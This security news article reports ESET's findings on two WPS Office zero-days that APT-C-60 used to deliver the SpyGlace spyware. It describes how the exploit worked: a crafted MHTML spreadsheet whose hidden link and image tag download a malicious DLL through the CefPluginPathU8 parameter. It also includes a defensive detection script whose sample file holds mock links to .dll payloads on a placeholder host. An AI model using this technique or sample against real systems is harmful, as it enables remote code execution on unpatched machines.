
South Korean APT Group Exploits WPS Office Zero-Day

In recently published research, security firm ESET disclosed a zero-day vulnerability affecting WPS Office for Windows. WPS Office, developed by the Chinese firm Kingsoft, is extremely popular in Asia.

Reportedly, it has over 500 million active users worldwide. In total, ESET researchers discovered two zero-day vulnerabilities that would allow a threat actor to execute malicious code.


The first vulnerability, tracked as CVE-2024-7262, came to light when researchers were investigating suspicious activity by APT-C-60, an advanced persistent threat group operating out of South Korea, and noticed that the group's known downloader components were exploiting a previously undocumented WPS flaw.

The attack culminated in the delivery of a malware payload that included the SpyGlace spyware. ESET also determined that the malware was delivered to WPS users based in China.

ESET reported the vulnerability under a coordinated vulnerability disclosure policy. Kingsoft patched it silently, prompting ESET to publish details of the flaw. Further investigation by ESET led to the discovery of a second zero-day, CVE-2024-7263, which ESET researchers believe stemmed from an incomplete patch for CVE-2024-7262.

ESET provided more detail: Kingsoft's initial fix added validation for specific parameters, but some, such as 'CefPluginPathU8', were still not adequately secured, allowing attackers to point the application at paths on malicious servers from which malware payloads were downloaded.

Describing how the attacks observed by researchers were carried out, ESET stated:

The malicious document (SHA-1: 7509B4C506C01627C1A4C396161D07277F044AC6) comes as an MHTML export of the commonly used XLS spreadsheet format. However, it contains a specially crafted and hidden hyperlink designed to trigger the execution of an arbitrary library if clicked when using the WPS Spreadsheet application. The rather unconventional MHTML file format allows a file to be downloaded as soon as the document is opened; therefore, leveraging this technique while exploiting the vulnerability provides for remote code execution. Figure 1 shows how the document is displayed in WPS Spreadsheet: an image of rows and columns referencing the Coremail email solution, used as a decoy. The image hides the malicious hyperlink.

To exploit the vulnerability, researchers noted, a threat actor would need to store a malicious library somewhere accessible to the targeted computer, either on the system itself or on a remote share, and know its file path in advance.

In this instance, the threat actors leveraged a specific feature of the MHTML file format to have their malicious component downloaded and stored on the victim's system.

This proved to be a reliable way to exploit the flaw. The MHTML format was developed to allow Word and Excel documents to be viewed in a browser; to do this, it can carry HTML, CSS, and JavaScript components.

The threat actors added the HTML tag normally used to display images and used it to insert a malicious link that downloads files as soon as the document is opened. In this instance, the download was a custom library with a .dll file extension, crafted to exploit the WPS vulnerability.
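As an added defensive illustration (not code from ESET, Kingsoft, or the original article), the following Python triage script parses an MHTML file as the MIME container it is and flags the traits described above: hyperlinks or image tags whose target is a .dll, and links carrying the CefPluginPathU8 parameter name. The embedded sample document and the example.invalid host are constructed, not taken from the real campaign.

```python
from email import message_from_bytes, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not the real APT-C-60 document): a minimal MHTML container
# whose single HTML part holds a hidden hyperlink and an <img> tag, both pointing
# at a .dll on a placeholder host (example.invalid); decoy.png is benign.
SAMPLE_MHTML = b"""Content-Type: multipart/related; boundary="----=_BOUNDARY"

------=_BOUNDARY
Content-Type: text/html; charset="utf-8"

<html><body>
<img src="decoy.png">
<a href="http://example.invalid/loader.dll?CefPluginPathU8=x" style="display:none">x</a>
<img src="http://example.invalid/payload.dll">
</body></html>
------=_BOUNDARY--
"""

class RefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.refs = []  # every (tag, url) seen in <a href> and <img src>
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.refs.append(("a", attrs["href"]))
        elif tag == "img" and attrs.get("src"):
            self.refs.append(("img", attrs["src"]))

def suspicious_refs(mhtml_bytes):
    """Walk the MIME parts of an MHTML file; return (tag, url, reason) for each
    link or image targeting a .dll or carrying the CefPluginPathU8 name."""
    msg = message_from_bytes(mhtml_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = RefCollector()
        collector.feed(part.get_content())  # decoded per the part's charset
        for tag, url in collector.refs:
            reasons = []
            if urlparse(url).path.lower().endswith(".dll"):
                reasons.append("dll target")
            if "cefpluginpathu8" in url.lower():
                reasons.append("CefPluginPathU8 parameter")
            if reasons:
                findings.append((tag, url, ", ".join(reasons)))
    return findings
```

Running `suspicious_refs(SAMPLE_MHTML)` reports the hidden link (both traits) and the second image tag, while the benign decoy image is ignored.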

In conclusion, ESET researchers noted that APT-C-60's use of a zero-day exploit shows how determined the group is to compromise targets in East Asian countries.

Whether the group developed or bought the exploit for CVE-2024-7262 is a moot point at this stage; either way, it requires some research into the application's internals and knowledge of how the Windows loading process behaves.

The exploit is cunning: a legitimate-looking spreadsheet is deceptive enough to trick any user into clicking on it. The attack method is also notable for being highly effective and reliable. Further, the choice of the MHTML file format allowed the attackers to turn a code execution vulnerability into a remote one.

SpyGlace

ESET tracks the final malware payload as SpyGlace. Threat Book, however, published a detailed analysis of the malware in 2022 and tracks it as TaskControler.dll. The malware can readily be classified as spyware and/or a trojan; its core functionality revolves around file stealing, plug-in loading, and shell functions.

Researchers summarized the infection chain as follows:

The payload execution process in the attack is as follows. Starting from the downloaded compressed file, the persistence payload is divided into three parts: an LNK file with a malicious download, a downloader trojan (mssysmon.db) with file-information acquisition and download execution, and a remote-control trojan (TaskControler.dll) with file stealing, plug-in loading, and shell functions.

SpyGlace, or TaskControler.dll, is a 64-bit DLL component developed in C++. In determining whether APT-C-60 was behind the malware's delivery, Threat Book notes:

This sample is basically the same as the execution process of the landing payload in the previous APT-C-60 attack. The third-stage component TaskControler.dll is the same as in the historical attack, with the same export function and the same code behavior and communication process. The following figure is a screenshot of the analysis of the historical APT-C-60 attack, in which the forged payload component directory and the payload traversal loading logic in the DLL payload export function “extension”, “%AppData%\Roaming\Microsoft\”, are exactly the same. Therefore, it is more credible to attribute this attack sample to APT-C-60.


About the author:

Karolis Liucveikis

Karolis Liucveikis - experienced software engineer, passionate about behavioral analysis of malicious apps.
